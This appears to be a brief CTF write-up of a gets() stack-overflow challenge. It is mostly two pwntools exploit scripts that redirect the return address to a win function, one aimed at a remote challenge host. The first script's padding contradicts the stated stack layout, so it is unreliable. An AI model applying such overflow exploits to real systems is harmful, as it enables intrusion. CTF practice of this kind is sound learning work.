The gets() function does not limit the input length, so there is a stack overflow.
Looking at the stack layout, the padding before the return address is 0xf + 8 bytes.
There is a fun() function in the binary.
Build the exploit:
from pwn import *
p = process('pwn1')                      # local binary
#p = remote('redirect.do-not-trust.hacking.run',10026)   # remote instance
payload = b'A'*0xF + p64(0x401186)       # 0xf bytes of padding, then the address of fun()
p.sendline(payload)
p.interactive()
from pwn import *
io = remote('redirect.do-not-trust.hacking.run',10043)
context.log_level = 'debug'
# 0xf + 8 bytes of padding (buffer plus saved rbp), then a lone `ret` at 0x401198
# before fun() at 0x401186: the extra ret pops 8 bytes so rsp is 16-byte aligned
# when fun() calls system(), otherwise the movaps inside libc faults.
payload = b"A"*(0xf + 8) + p64(0x401198) + p64(0x401186)
io.sendline(payload)
io.interactive()
This is an exp from a master online. I debugged for a long time and it just would not work; even after reading this I still don't quite understand why p64(0x401198) has to be added.
Let me keep going with the later challenges first!
References:
https://blog.csdn.net/weixin_46436680/article/details/105853304?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2aggregatepagefirst_rank_ecpm_v1~rank_v31_ecpm-2-105853304.pc_agg_new_rank&utm_term=BUUCTF%E4%B8%ADrip&spm=1000.2123.3001.4430
http://blog.eonew.cn/archives/958